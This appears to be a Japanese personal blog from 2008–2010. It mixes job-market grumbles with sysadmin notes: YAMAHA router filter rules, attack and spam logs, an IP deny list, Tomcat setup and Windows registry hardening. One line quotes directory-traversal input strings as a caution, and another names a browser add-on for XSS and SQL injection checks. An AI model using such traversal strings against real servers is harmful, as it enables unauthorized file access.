店舗ばかり増やしてたら。きっとPCが企業の基幹システムとして機能するまでは、重要視されないのでしょう…
だから派遣会社がウハウハなんでしょうけども。
さて、生活に困らなくなる前に新しい会社が見つかるでしょうかねぇ。
世界恐慌時、アメリカの株価は90%まで下落したそうですが
御社がその状態になった時、危機管理は出来ていますか?
って質問しても、答えられない企業ばかりなんです…
(入社して数年で倒産は勘弁。未払い賃金全額戻ってこないですし)
日本のエンジニアよ、40歳で使い捨てられてもいいのか?
日本のIT業界を根底から変えるヘッドウォータースにインタビュー
http://gigazine.net/index.php?/news/comments/20081021_headwaters/
今の日本に未来が無い事は経営者の皆さんはご存知のはず…
面白そうな問題が下の方に書かれていますね。
1は考察力、2は暗号化、3は最適化ですかね。
後からやってみよう…
1,3はスグ判りますね。
深読みするなら、3は人が行っているので差し込む場所が既に特定されているって事でしょうか。
2は、数字と文字のテーブルを作れば結果はスグですね。
地元でこういう会社があると良いのだけど。。。
ちなみに1は、4.3.3 何故かは自分で考えろと。6.3.2 じゃないよ。
第17回 年収400万円と600万円で差が出る職務経歴書
http://jibun.atmarkit.co.jp/lemb01/rensai/kktj17/kktj01.html
技術職を失ったときに試したい14のこと--経済危機を乗り切るために
http://japan.cnet.com/special/story/0,2000056049,20382629,00.htm
ITSSは、いまどう使われているのか
http://www.atmarkit.co.jp/im/cits/serial/ithr/01/01.html
プログラマーを採用する際に重視すべき10の資質
http://japan.zdnet.com/sp/feature/07tenthings/story/0,3800082984,20382969,00.htm
今日、元同僚と話をする機会がありました。
デスマーチ状態の会社に入ったようで・・・
納期とは遅れるものだ
http://www.atmarkit.co.jp/im/cits/serial/murphy/12/01.html
で言う所の「努力しています」「遅れています」辺りみたい。
大変そうだ。
占いはね、占う者と占われる者との間で行われるやり取りだから…
知りたいと思っている者には、占い師は答えなくてはならない。
己の出来る限り全ての力で、決して疎かにしてはならない。
どの職業でもそれは同じ事だけど
目に見えない、形に出来ない事だからって、嘘をついたり
出来ない事をさも出来る様に振舞うのは、本気の相手にも失礼よ…
by XXXHOLiC
これからの時代、安かろう悪かろうビジネスはもう通用しないと思われるがいかに。
社員が壊れる【1】“抜け殻”正社員、派遣・請負依存経営のツケ
http://business.nikkeibp.co.jp/article/person/20081027/175268/
第1回■ぜい弱性がなくならない本当の理由(わけ)
http://itpro.nikkeibp.co.jp/article/COLUMN/20081110/318939/
結局のところ目先の利益を優先しすぎた反動ですね。
宅配業者をコロコロ変えてる企業も、顧客の事を全く考えてませんよね。
「ヨドバシ・ドット・コム」がリニューアル直後から表示が遅すぎて激重になる大規模障害が発生、一体何が起きているのか?
http://gigazine.net/index.php?/news/comments/20081029_yodobashi_slow/
ヨドバシドットコムのリニューアル失敗から学ぶべきたったひとつのこと
http://neta.ywcafe.net/000938.html
原因は、画像を動的に表示させているサーバのTCPコネクション不足ですかね。
それなら負荷分散クラスタで数台増やせば、直りそうな予感。
九十九電機、民事再生法の適用を申請
http://slashdot.jp/article.pl?sid=08/10/30/0330208
ここ数年、景気悪そうな雰囲気ありましたからねぇ。
ここも貸し渋りで、、、ですね。
米国の失業者1ヶ月に24万人増加…ばくち資本主義から早く脱却しよう…
http://blog.goo.ne.jp/tokyodo-2005/e/b3adfa2d25fa7c28d7cadb669287d3b6
株価が90%まで下落しても平気な資金力がある会社ってどれ位あるんだろう。。。
名古屋で夢破れ、職失い… 支援施設、全国から入所者
http://www.asahi.com/national/update/1114/NGY200811130022.html
立場が違えば考え方も変わってきますが
今後もっと悲惨な事態になるでしょうし
弱者が虐げられる行為に歯止めは…
次は口座預金の保障をしないって事になるのでは。。。
SFCG、貸し剥がしの実態
http://www.nikkeibp.co.jp/article/column/20081113/112198/
政府、銀行、ファンドがグルになってる訳ですから止まりません。。。
利によって行えば怨み多し。
やっぱり、年金より生活保護のが得じゃん
http://d.hatena.ne.jp/yumyum2/20081117/p3
よく利用させて頂いてる薬局のオーナーも
働いている私達より生活保護を受けている人の方が
いい生活をしている、納得いかない。
とぼやいていたのを思い出した…
腕時計。
面接の人って結構見るんですよね。
手首が痛くなるから着けないのですが、面接の時は在った方が印象が良いみたい。
どうせつけるなら技術屋さんは、24時間盤のフォルティスが便利かも。(10年使うと、1日30秒程度狂うらしいけど)
↓こんなの。
http://www.fortis.jp/fliegerclassic.html
フォルティスは5年程前から流行りだしています。
新・10分でわかる。株式会社の作り方
http://blog.kndb.jp/president/2008/10/10.php
交際費400万円(年間)が自由に使える、それが「スーパーサラリーマン化」計画
http://moneyzine.jp/article/detail/57311
eSATAリムーバブルケース の電源が突然死亡した…
さすがに電源の予備は持ってないや。。。
http://www.rexpccard.co.jp/products/subpage/sadk5es.html
これ。
HDDが1台巻き込まれ故障。さらにHDDが不安定(転送速度が 2MB/S 辺りまで下がって怪しかった)
原因はeSATAカードに在った。5連のドライブ全部昇天しちゃったじゃん。
今後は iSCSI のが良いのかも。
SeagateのBarracuda 7200.11などにアクセス不能になる不具合
http://pc.watch.impress.co.jp/docs/2009/0119/seagate.htm
YAMAHAのRTX1200ゲット。http://netvolante.jp/products/rtx1200/index.html
不正アクセス検知の検知回数
種別 名称 検知回数
IPヘッダ Land attack 15015
2008/11/07 02:07:49 Land attack 61.194.16.124 61.194.16.124
2008/11/07 02:09:57 Land attack 61.194.16.124 61.194.16.124
2008/11/07 02:10:58 Land attack 61.194.16.124 61.194.16.124
早速デスか。
フィルターのかけ方がイマイチ判らん…
暫くは、たまにアクセス出来なくなるかも。
とりあえず、お約束ルール
LAN1: LAN
LAN2: FTTH, flets-square http://www.rtpro.yamaha.co.jp/RT/FAQ/PPPoE/multi-session-example.html
LAN3: DMZ http://netvolante.jp/solution/int/case4b.html
--
ip filter source-route on
ip filter directed-broadcast on
ip filter 1010 reject * * udp,tcp 135 *
ip filter 1011 reject * * udp,tcp * 135
ip filter 1012 reject * * udp,tcp netbios_ns-netbios_ssn * ※137〜139 まで
ip filter 1013 reject * * udp,tcp * netbios_ns-netbios_ssn ※137〜139 まで
ip filter 1014 reject * * udp,tcp 445 *
ip filter 1015 reject * * udp,tcp * 445
ip filter 1020 reject 192.168.x.0/24 *
ip filter 1030 pass * 192.168.x.0/24 icmp
ip filter 2000 reject * *
ip filter 3000 pass * *
ip filter dynamic 500 * * tcp
ip filter dynamic 501 * * udp
ip lan3 secure filter in 2000
ip lan3 secure filter out 3000 dynamic 500 501
pp select 1
ip pp secure filter in 1020 1030 2000
ip pp secure filter out 1010 1011 1012 1013 1014 1015 3000 dynamic 500 501
pp enable 1
--
後は DMZ のポート空け。
※IPアドレスのフィルタは、10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16 で割り当てられているグローバル IP も
含めて設定しておいた方がよいです。インターネット側からルータを通ってこの IP が来る事はありません。
次は、統合脅威管理のアプライアンスが欲しいけど、先に就職先を見つけねば…
米SonicWALL、3Gデータ通信カードに対応した小規模企業向けUTM製品「SonicWALL NSA 240」
http://www.rbbtoday.com/news/20081105/55483.html
今朝はWebサーバーのログにこんなのが。
2008/11/07 7:45:01 static.108.75.46.78.clients.your-server.de
リファラーを偽装して http://www.netdive.jp/memo.asp からきた事にしてますね。
/wedding-cocktail-favor-ct20122.html
/wedding-coffee-favor-dswc0126.html
/cappunccino-wedding-favors-dswca5119.html
/cappunccino-wedding-favors-dswca5118.html
/snowflake-boxes-dswb1010.html
/ourguarantee.html
/thankyounotes.html
/candyfood.html
/americanbridal-editors-picks.html
/place-card-holder-dska27023na.html
/wedding-mints-favors-dsmints44.html
/personalized-chocolate-favors-dsdd4210121.html
/wedding-cocktail-favor-ct20120.html
/coaster-wedding-favors.html
/cocoa-wedding-favors-dswco50121.html
/personalized-notebook-favors-dseb1088.html
/personalized-chocolate-favors-dsmbw35.html
/whats-hot.html
/snowflake-coaster-dska27010.html
/bookmark-wedding-favors-dsfc6472.html
/wine-wedding-favors.html
/tea-favor-wt0130.html
/shopbyprice.html
/uniquefavors.html
/wedding-coffee-favor-dswc0124.html
/scented-pine-cone-dswb1016.html
/golf-wedding-favors.html
/candle-wedding-favors-dsfc3992.html
/seasonal-wedding-favors.html
/newsletter.html
/testimonials.html
/tea-favor-wt0128.html
/candle-wedding-favors-dsfc3991.html
/cocoa-wedding-favors-dswco50120.html
/tea-favor-wt0124.html
/pen.html
/ceres.html
/tea-favor-wt0129.html
/weseof.html
/cappuccino-wedding-favors-dswcapm02.html
/snowflake-candle-dsfc4137.html
/bridgif.html
/plachol.html
/bookmark-wedding-favors-dsfc6478.html
/wine-stopper-wedding-favors-dsfc1913.html
/weddingbubbles.html
/snowflake-bookmark-favors-dska14043na.html
/personalized-chocolate-favors-dsdd4210126.html
/bridac.html
/brgopr.html
/snowflake-favor-boxes-dska28080na.html
/secure.html
/wedding-cake-candle-favors-dska20065bl.html
/brshac.html
/place-card-holders-wedding-favors-dsfc5365.html
/scented-pine-cone-dswb1020.html
/bottle-stopper-wedding-favors-dsfc1926.html
/gifts.html
/snow-cone-bath-salt-dswb1011.html
/christmas-tree-soaps-dswb1019.html
/cappunccino-wedding-favors-dswca5122.html
/pine-cone-sachets-dswb1018.html
/beach-wedding-favors.html
/personalized-notebook-favors-dseb2053.html
/newproducts.html
/pine-cone-pyramid-boxes-dswb1017.html
/fashionjewelry1.html
/cappunccino-wedding-favors-dswca5120.html
/engraving-information.html
/tabdec.html
/practical-wedding-favors.html
/personalized-cookie-mix-dseb2058.html
/garden-flower-favors.html
/best-sellers.html
/tea-favor-wt0126.html
/personalized-muffin-mix-dseb2057.html
/personalized-mint-tins-favors-dseb2052.html
/discount-wedding-favors.html
/aboutus.html
/bottle-stopper-wedding-favors-dska11039na.html
/wedding-coffee-favor-dswc0123.html
/place-card-holder-favors-dska14033na.html
/ab-site-map.html
/invitations.html
/asiantheme.html
/personalized-favor-tags.html
/wedding-coffee-favor-dswc0122.html
/cldiit.html
/personalized-chocolate-favors-dsdd4210123.html
/embroidery-information.html
/wedding-cocktail-favor-ct20117.html
/tea-favor-wt0125.html
/shot-glass-dsws8240.html
/wedres1.html
/bridal-spaces.html
/descol.html
/candle-wedding-favors.html
/inexpensive-wedding-favors.html
/personalized-cocoa-favors-dseb2054.html
/fall-wedding-favors.html
/personalized-bookmark-favors-dseb1086.html
/tea-lights-wedding-favors-dska20070.html
/pink-favors-gifts.html
/snowflake-takeout-boxes-dswb1015.html
/snowflake-wine-stopper-dsws6096.html
/bathsoapfavors.html
/photo-coasters-favors-dska27027bl.html
/pe.html
/cocoa-wedding-favors-dswco50118.html
/wedding-cocktail-favor-ct20118.html
/key-chains-wedding-favors-dsfc6477.html
/placecard-holders-dsws6071.html
/cocoa-wedding-favors-dswco50122.html
/silver-wedding-favors.html
/tea-favor-wt0127.html
/contact-us.html
/cappunccino-wedding-favors-dswca5121.html
/wedding-cocktail-favor-ct20121.html
/cocoa-wedding-favors-dswco50119.html
/holiday-favor-boxes-dswb1013.html
/wedding-cocktail-favor-ct20116.html
/cocoa-wedding-favors-dswcopm02.html
/personalized-candy-jars-favors-dseb2051.html
/reces.html
/shipin.html
/winter-wedding-favors.html
/theme-weddings.html
/99-cent-wedding-favors.html
/merry-mitten-sachets-dswb1012.html
/gel-candle-favors-dska20068na.html
/wedsup.html
/bells.html
/link-to-us.html
/weddingcameras.html
/snowflake-soaps-dswb1014.html
/groomgif.html
/wedding-coffee-favor-dswc0121.html
/personalized-tape-measure-dseb1075.html
/favors-by-colors.html
/weddingfavors.html
/something-blue.html
/wedding-cocktail-favor-ct20119.html
/gift-registry.html
2008.12.13時点の拒絶IP一覧
189.0.0.0/8
200.0.0.0/8
201.0.0.0/8
85.138.176.0-85.138.255.255
上記URLフィルターをかけたら、自分のサイトがブロックされた…
ひでぇ仕様だな。
新しいルーターが発表されましたね。
ヤマハがFWルータにトレンドマイクロ技術を搭載、Webからの脅威へ対応
http://enterprise.watch.impress.co.jp/cda/security/2008/12/16/14545.html?ref=rss
ヤマハルーター運用設定マニュアル RTX1200/ SRT100のGUI&コマンドラインの実践 (大型本) ってのを買いました。
Windows Server 2008 実践ガイド (大型本) にも YAMAHA のルーターの設定が少しかかれています。
YAMAHA の ルーターは Wake On LAN に対応しているようなのでそのうち調べる・・・
管理者権限で wol send lan1 00:00:00:00:00:00<起動したい PC の MAC アドレス で OK みたい。
RTX1200 ファーム
Rev.10.01.08(Dec. 2008)
http://www.rtpro.yamaha.co.jp/RT/docs/relnote/Rev.10.01/relnote_10_01_08.txt
Rev.10.01.11(Apr. 2009)
http://www.rtpro.yamaha.co.jp/RT/docs/relnote/Rev.10.01/relnote_10_01_11.txt
Rev.10.01.16(Oct. 2009)
http://www.rtpro.yamaha.co.jp/RT/docs/relnote/Rev.10.01/relnote_10_01_16.txt
それはねぇよ…
USBメモリーに入っているワードのファイルを直接編集してた時の出来事。
どうもUSBメモリーの空き容量がギリギリだったらしく、上書き保存に失敗。
それだけなら問題ないが、あろう事か元データーまで消しやがった…
しかも、ワード落ちるし…
みなさん、USBメモリーで直接編集する場合は十二分ご注意を。。。
OS で制限の多いバージョンを出す意味も訳判りませんね。
使いたい機能が制限されている場合は、結局違うアプリで代用しちゃう訳だから
両者に取って損してると思うんだけど…
機能制限してソフトの価格下げるのが目的なんだろうけど
これをすると失敗する方が多い気がしますよね?
BOSE M3
昔、発売と同時に購入した製品なんですが、生産終了になってたんですねぇ。。。
600台限定で再販するそうです。
Bose、コンパクトスピーカー「M3」を600台限定で再販
http://plusd.itmedia.co.jp/lifestyle/articles/0901/13/news050.html
場所取らないし、アンプ内臓してますので日本の住宅事情にも優しいです。
但し、BOSE製品は低音が響きますので隣人には優しくないかも。
JAVA の開発環境構築
Java SE Development Kit (JDK)
http://java.sun.com/javase/ja/6/download.html
※セットアップ後、環境変数にPathを通しておく。
変数名
JAVA_HOME
C:\Program Files\Java\jdk1.6.0_13
Path
;%JAVA_HOME%\BIN <-最後に追加
パスが通ったかの確認は、コマンドプロンプトから
javac -version
この時点でメモ帳を使ってコーディング可能。
開発ツールのセットアップ
Eclipse Downloads
http://www.eclipse.org/downloads/
Eclipse IDE for Java EE Developers (163 MB)
http://www.eclipse.org/downloads/download.php?file=/technology/epp/downloads/release/ganymede/SR2/eclipse-jee-ganymede-SR2-win32.zip
Eclipse 日本語化言語パック (サードパーティ版)
http://www.igapyon.jp/blanco/nlpack/eclipse/index.html
Eclipse IDE for Java EE Developers
http://sourceforge.jp/projects/nttdatagroup-oss-square/downloads/33232/NLpackja-eclipse-jee-ganymede-SR1-blancofw.zip
features,plugins を Eclipse のフォルダへコピー
Webアプリの環境構築
Tomcat
http://archive.apache.org/dist/tomcat/tomcat-6/
※v6.0.18 は正常に動かない場合があるので v6.0.16
http://archive.apache.org/dist/tomcat/tomcat-6/v6.0.16/bin/apache-tomcat-6.0.16.exe
Tomcat Manager 利用時のアカウントは適当に。
セットアップ後、http://localhost:8080/ でページが表示されればOK
Sysdeo Eclipse Tomcat Launcher plugin
http://www.eclipsetotale.com/tomcatPlugin.html
http://www.eclipsetotale.com/tomcatPlugin/tomcatPluginV321.zip
解凍後のフォルダを丸ごと、dropins に移動。
Eclipse 起動後、ウィンドゥ>設定 で 左のツリーから Tomcat を選択し
Tomcatバージョンを 6.x
Tomcatホームを C:\Program Files\Apache Software Foundation\Tomcat 6.0 (標準の場合)
コンテキスト・ファイルを選択して
C:\Program Files\Apache Software Foundation\Tomcat 6.0\conf\Catalina\localhost (標準の場合)
とする。
背後で Tomcat 等を動かしている場合は、ディレクトリトラバーサルに注意する。
../../ こんなんや utf8 で %c0%ae%c0%ae こんなん。
多層防御を有効にする
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLESEARCHPATH_KB963027
値の名前 : iexplore.exe
データの種類 : REG_DWORD
データの値 : 0
コマンドプロンプトから登録するには
REG ADD "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLESEARCHPATH_KB963027" /v iexplore.exe /t REG_DWORD /d 0x00000000 /f
MS09-014 - 緊急 Internet Explorer 用の累積的なセキュリティ更新プログラム (963027)
http://www.microsoft.com/japan/technet/security/bulletin/ms09-014.mspx
REG ADD "HKLM\System\CurrentControlSet\Control\Session Manager" /v SafeDllSearchMode /t REG_DWORD /d 1 /f
下記に書かれているレジストリ位置 CCS はおそらくミスでしょう
MS09-015 - 警告 SearchPath の複合的脅威の脆弱性により、特権が昇格される (959426)
http://www.microsoft.com/japan/technet/security/bulletin/ms09-015.mspx
[MS09-015] SearchPath の複合的な攻撃の脆弱性により、特権が昇格される
http://support.microsoft.com/kb/959426
ウェブサイト競争力分析 - MyCompetitor.info
http://www.mycompetitor.info/
こんなサイトがあった。
netdive.jp の結果は http://www.mycompetitor.info/dm/netdive.jp
yahoo からのアクセスの方が多い気もするけど、、、
出前館 http://demae-can.com/
せめて、MX レコードに書いてある IP アドレスからメールを送信してください…
これじゃスパムと変わらない。。。
SPF 書いてあるのに、記載のないIPアドレスから送信してくる所あるし、、、
Windows Server 2008 の DFS を使った共有。
2003 Server から ip アドレスで繋がらない(アクセスを拒否される)
2008 Server からだと問題なかったから、悩んだ…
名前解決出来ない場合は、hosts ファイルに書いておきましょう。
あと、2008 の UAC はトラブルの元になるので切ってくのが無難。
そろそろ、2008 関連の情報をまとめたい感じ。。。
Windows Server 2008でSuperFetchを有効にする
http://www.atmarkit.co.jp/fwin2k/win2ktips/1216svfetch/svfetch.html
Secunia Personal Software Inspector のメッセージ
えぇ?上限100%じゃないんでつか。
MS09-048 で追加されたメモリ負荷に対する保護機能(Memory Pressure Protection)について
TCP スタックの新しいメモリ機能の保護機能の説明
http://support.microsoft.com/kb/974288
DoS による大量の TCP セッションが発生した場合
ランダムにTCP セッションを切断、SYN 要求を拒否し
システムを保護する。
Windows Server 2003 はレジストリでの制御
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
Internet Protocol version 6 (IPv6):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters
値の名前 : EnableMPP
データの種類 : REG_DWORD
データの値 : 1(有効) 0 で無効 ※既定は1で有効。
特定のインターフェイスの MPP 設定を無効
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\GUID
Internet Protocol version 6 (IPv6):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip6\Parameters\Interfaces\GUID
値の名前 : DisableMPPOnIF
データの種類 : REG_DWORD
データの値 : 1 で無効
ポート範囲の除外の追加
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
Internet Protocol version 6 (IPv6):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters
値の名前 : MPPExcludedPorts
データの種類 : REG_MULTI_SZ
データの値 : 0 - 65535 例)5000-5010
Windows Vista、 Windows7、Windows Server 2008 では netsh コマンドにて制御
netsh int tcp reset
セキュリティの設定と共に、他の TCP 設定を使用してリセットします。
netsh int tcp show security
現在適用されているセキュリティ設定を表示
netsh int tcp set security mpp=[enabled|disabled|default]
MPP 設定を切り替えます。
netsh int tcp set security Profiles=[enabled|disabled|default]
プロファイルを切り替えます設定します。
netsh int tcp set security startport= numberofports= mpp=[enabled|disabled|default]
ポート範囲の除外の追加(有効なポート範囲は 0 - 65535)
例)
ポート 5000 を 5009 の MPP 機能を無効
netsh int tcp set security startport=5000 numberofports=10 mpp=disabled
追加された除外エントリを削除
netsh int tcp set security startport=5000 numberofports=10 mpp=enable
※ネットワークにつながる全ての機器が対象になりますのでルータ等にもプログラムが出てないか確認しましょう。
auの携帯。
一部の機種で TABLE の入れ子が出来ない…
調べたら AU の XHTML Basic 機では、許されて無いらしい…
ソフトバンクは、5個まで。
インスタントコーヒー
スプーン1さじ分とか、出せるように考えれば特許取れるのでは。。。
ブラックで飲むからスプーン使わないのよねぇ…
ネットワーク ダイレクト メモリ アクセス (NetDMA)
有効化
netsh int tcp set global chimney=enabled
無効化
netsh int tcp set global chimney=disabled
現在状態を確認
netsh int tcp show global
※有効にした場合は、ネットワーク アダプター上の TCP Chimney Offload のチェックを入れること。
NetDMA の有効化
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : EnableTCPA
データの種類 : REG_DWORD
データの値 : 1 で有効 0 で無効
Windows Server 2008 で TCP Chimney オフロード、受信側のスケーリング、およびダイレクト メモリ アクセスのネットワーク機能に関する情報
http://support.microsoft.com/kb/951037
パラレル ポート (Parport) サービスの無効化
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Parport
値の名前 : Start
データの種類 : REG_DWORD
データの値 : 4
2 自動 (デフォルト)
3 手動
4 無効
パラレル ポートを搭載していない Windows Vista ベースまたは Windows Server 2008 ベースのコンピュータでエラー メッセージ "パラレル ポート ドライバ サービスは開始できませんでした" が表示される
http://support.microsoft.com/kb/935497/
リファラー
http://www.kojikoji.net/ へのアクセスログですが
2009/10/30 14:46:45 200 GET Monazilla/1.00+(JaneView/0.1.12.1) *.kanagawa.ocn.ne.jp http://www.google.co.jp/search?q=%E5%AF%82%E3%81%97%E3%81%84%E3%82%AA%E3%83%83%E3%83%88%E3%82%BB%E3%82%A4&ie=utf-8&oe=utf-8&aq=t&rls=com.ubuntu:en-US:unofficial&client=firefox-a
「寂しいオットセイ」…ウケたwww
いやいや、そんな検索キーワードでは Hit しませんから。
Firefox Extension の RefControl 使ってるのかな。
便利なアドオンとして
Web Developer 日本語版 ウェブ制作を補助する拡張機能を追加。
HTML Validator HTML の整合性のチェックに。
Live HTTP Headers ヘッダー情報の確認。
User Agent Switcher ユーザエージェントの変更。
Add N Edit Cookies クッキーの編集。
RefControl サイト毎にリファラのON/OFFとカスタムの設定が出来る。
FoxyProxy プロクシ。固定IPでサーバを立てている場合で外から見たい場合などに。
HackBar XSS や SQL Injection のチェックに。GET や POST、リファラーのテストなど。。。
ShowIP nslookup してくれる。
必須のプラグイン
Firebug https://addons.mozilla.jp/firefox/details/1843 Web 開発ツール
YSlow https://addons.mozilla.org/en-US/firefox/addon/5369 Webサイトの性能評価
システム ファイル キャッシュの最大値と最小値を設定(Windows Server 2008 まで R2 と Windows7 は対策されています)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DynCache\Parameters
値の名前 : BackOffMBytesOnLowMemory
データの種類 : REG_DWORD
データの値 : 500(MBytes)
メモリ不足通知のしきい値 0にはしない。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
値の名前 : LowMemoryThreshold
データの種類 : REG_DWORD
データの値 : (Mbytes)
値の名前 : MaxSystemCacheMBytes
データの種類 : REG_DWORD
データの値 : 0(default で90%)1-99 ではメモリの割合(%) 200 とするとシステムキャッシュは200MBとなる。
値の名前 : MinSystemCacheMBytes
データの種類 : REG_DWORD
データの値 : 100(MBytes default)
値の名前 : SampleIntervalSecs
データの種類 : REG_DWORD
データの値 : 60(秒) プロセスの動作を監視 0で監視しない
値の名前 : CacheUpdateThresholdMBytes
データの種類 : REG_DWORD
データの値 : 100(0 がデフォルトで 100 MBytes)
Microsoft Windows Dynamic Cache Service
http://www.microsoft.com/downloads/thankyou.aspx?familyId=e24ade0a-5efe-43c8-b9c3-5d0ecb2f39af&displayLang=en
ここのサンプルから、DynCache.exe を %SystemRoot%\System32 へコピー
sc コマンドでサービスとして登録。
sc create DynCache binpath= %SystemRoot%\System32\DynCache.exe start= auto type= own DisplayName= "Dynamic Cache Service"
停止したい場合
sc stop DynCache
削除したい場合
sc delete DynCache
詳しくはダウンロードした付属のファイルを確認。
ほとんどの物理 RAM のシステム ファイルのキャッシュを使用する場合、アプリケーションおよびサービスのパフォーマンスの問題が発生します。
http://support.microsoft.com/kb/976618/ja
お名前.com
2009年11月29日の17時30頃から、サイトに接続できないって事が発生。
問題は、お名前.com の DNS に障害が発生していたようで・・・
復旧が翌日になると言う結構大事な事態に。(中の人はお疲れ様でした)
http://hde03.gmo.jp/c/l/D0001I1595C25487403S18ef3632.html
で、実際の所は何が原因なんですかね。DNS の設定ミス?
外部からの DDoS ?
DNSサーバーがDDoSに悪用される!?/知って得するドメイン名のちょっといい話 #5
http://web-tan.forum.impressrd.jp/e/2009/01/15/4414
「ゾンビPCにやられた」--アカマイ、DNSサーバへのDDoS攻撃を認める
http://japan.cnet.com/news/sec/story/0,2000056024,20069290,00.htm
分散サービス拒否(DDoS)攻撃を仕掛けるDNS ampとは?
http://www.atmarkit.co.jp/fwin2k/win2ktips/781dnsamp/dnsamp.html
DNS の再帰的な問合せを使った DDoS 攻撃の対策について
http://jprs.jp/tech/notice/2006-03-29-dns-cache-server.html
DNS の再帰的な問い合わせを悪用した DDoS 攻撃手法の検証について
http://www.cyberpolice.go.jp/detect/pdf/20060711_DNS-DDoS.pdf
記事になりました。
「お名前.com」のレンタルDNSに障害、3万3000件に影響
http://internet.watch.impress.co.jp/docs/news/20091201_332542.html
IPA が注意勧告出しましたね。
ウェブサイトで利用されているDNSサーバの既知の脆弱性への注意喚起
http://www.ipa.go.jp/security/vuln/documents/2009/200912_dns.html
まぁ、隠しててもそういう事だったんでしょう。
車上あらし
やられた。
どうやらオートロックが作動してなく、ここ2週間ほど無施錠状態っぽ。
THIS BOΦWY DRASTIC
THIS BOΦWY DRAMATIC
悪魔城年代記 悪魔城ドラキュラ Original Soundtrack
任天堂 サウンドヒストリーシリーズ「ゼルダ ザ ミュージック」 [Compilation] [Soundtrack]
「グラディウス」アーケードサウンドトラック
レイフォース [CD] ゲーム・ミュージック; ZUNTATA
レイストーム [CD] ゲームミュージック; ZUNTATA
EXTRA - OFFICIAL COMPILATION
TECHNIC BEAT SOUND TRACK
覚えてるのは、これぐらいかなぁ。
アマゾンの中古価格で合計 16,637円。これが時価になるかな。
売っても100円や200円程度かと思って警察に時価総額 1000円ぐらいって話しちゃった。
にしてもセンサーで施錠するはずなのに、ロックされてないってのは頂けない。
どうやら電池交換した時にカス電池を掴まされてた感じ。
ちゃんと国産買いましょう、って事で。。。
amazonaws を使ったハッキングについて
結構国内でも、これ使ってフォルダの存在確認してる人が居るようで・・・
匿名だとでも思ってるんでしょうかね。
「攻撃元は『ボットネット』から『クラウド』へ」、ラックが警告 悪用されるクラウドサービス、2009年は攻撃数が5倍以上に
http://itpro.nikkeibp.co.jp/article/NEWS/20091209/341795/
セキュリティにクラウドの闇、Amazon EC2悪用の総当たり攻撃も
http://internet.watch.impress.co.jp/docs/news/20091208_334134.html
”雲(AWS)”の中に潜んでいたゼウス
http://blog.f-secure.jp/archives/50313859.html
偽アンチウイルスと大差ないじゃん。
フラッシュのアップデート時に、デフォルトでマカフィをインストールさせられる。
ちゃんとチェックを外してればいいんだけど、1クリックで確認無しでインストーラーが
起動してインストールしちゃう。
しかも、インストールされてるアンチウイルスを止めさせて製品版を買わせようとしてる。
偽アンチウイルスソフトとやり方変わらないじゃん!
こんなことしてると、印象や評価、がた落ちだと思うのですが・・・
DHL Express を装った ZIP 付きメール(2009.12.9)
スパマー、DHLを悪用してまた悪意のあるメール攻撃
dhl_n756512.zipを開くな!
http://www.sophos.co.jp/pressoffice/news/articles/2009/03/dhl.html
今回の添付は DHL_Label_433.zip となっていますが、まぁこれでしょう。
格安オークション ヤスオク
http://www.yasuoku.jp/
すげー、よく考えてるなぁ。
1.商品をアマゾンの買い物カゴに入れて確保しておく。
2.オークションで、1円スタート。
3.入札には専用のコインを買わせておいて、1入札に付き 75円消費させる。
4.入札は1円毎のカウントしかさせない。
5.入札があった場合、20秒延長させる。
6.入札ぎりぎりで自動入札機能。
PlayStation 3 の入札例だと、最終価格 ¥1,411 になってるから
1410回クリックされたとして、1410x75=105750
そりゃ、普通にアマゾンから商品送れるわ。
【やじうまWatch】 ネトラン最終号が店頭に並ぶ、裏表紙には一言「あきらめた。」 ほか -INTERNET Watch
http://internet.watch.impress.co.jp/docs/yajiuma/20091210_334667.html
2月号に
「iモーション着うた化UPLOADER」(http: www.netdive.jp i )というサービスを利用するのもオススメだ。
とか書かれてたみたいだけど。。。
http://www.fujisan.co.jp/zasshi-kensaku.asp?sid=227902&q=%83%82%81%5B%83V%83%87%83%93
こういう雑誌を見て犯罪に走る人ってどれぐらい居るんでしょうかね。
今後起こる 20xx年問題。
・2010年 暗号の問題。もう避けられない? 暗号の2010年問題-@IT
利用率7割のWEPは「1分」で破られる http://itpro.nikkeibp.co.jp/article/COLUMN/20080126/292105/
文字コードの問題。新常用漢字表が迫るUnicode移行、「シフトJIS」では対応不可能
・2011年 地上アナログ放送の中止。
・2014年 D端子・アナログ端子への出力禁止。「2014年以降はD端子への出力を全面禁止」,次世代光ディスクの著作権保護方式が固まる【訂正あり】-Tech-On!
・2036年 コンピュータの誤動作。IT用語辞典バイナリ
・2038年 コンピュータの誤動作。フリー百科事典『ウィキペディア(Wikipedia)』
こんなもん?
続2000年問題 西暦の下二桁が16進で 09 → 10 で 16 になっちゃった系
「2000年問題」が10年遅れてオーストラリアを直撃、金融システムが大混乱に陥る
http://gigazine.net/index.php?/news/comments/20100104_y2k_in_australia/
【韓国】年度変わりで携帯電話の不具合が続発…サムスン、LG、パンテック製など「2010年」のメールなどに不具合 [01/04]
http://yutori7.2ch.net/test/read.cgi/news4plus/1262598626/
2010年の世界リスク
http://eurasiagroup.net/pages/top-risks
1 - US-China relations
2 - Iran
3 - European fiscal divergence
4 - US financial regulation
5 - Japan
自動フォルダ・タイプ機能を無効化(VISTA以降でいけると思う)
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell
値の名前 : FolderType
データ型 : REG_SZ
値 : NotSpecified
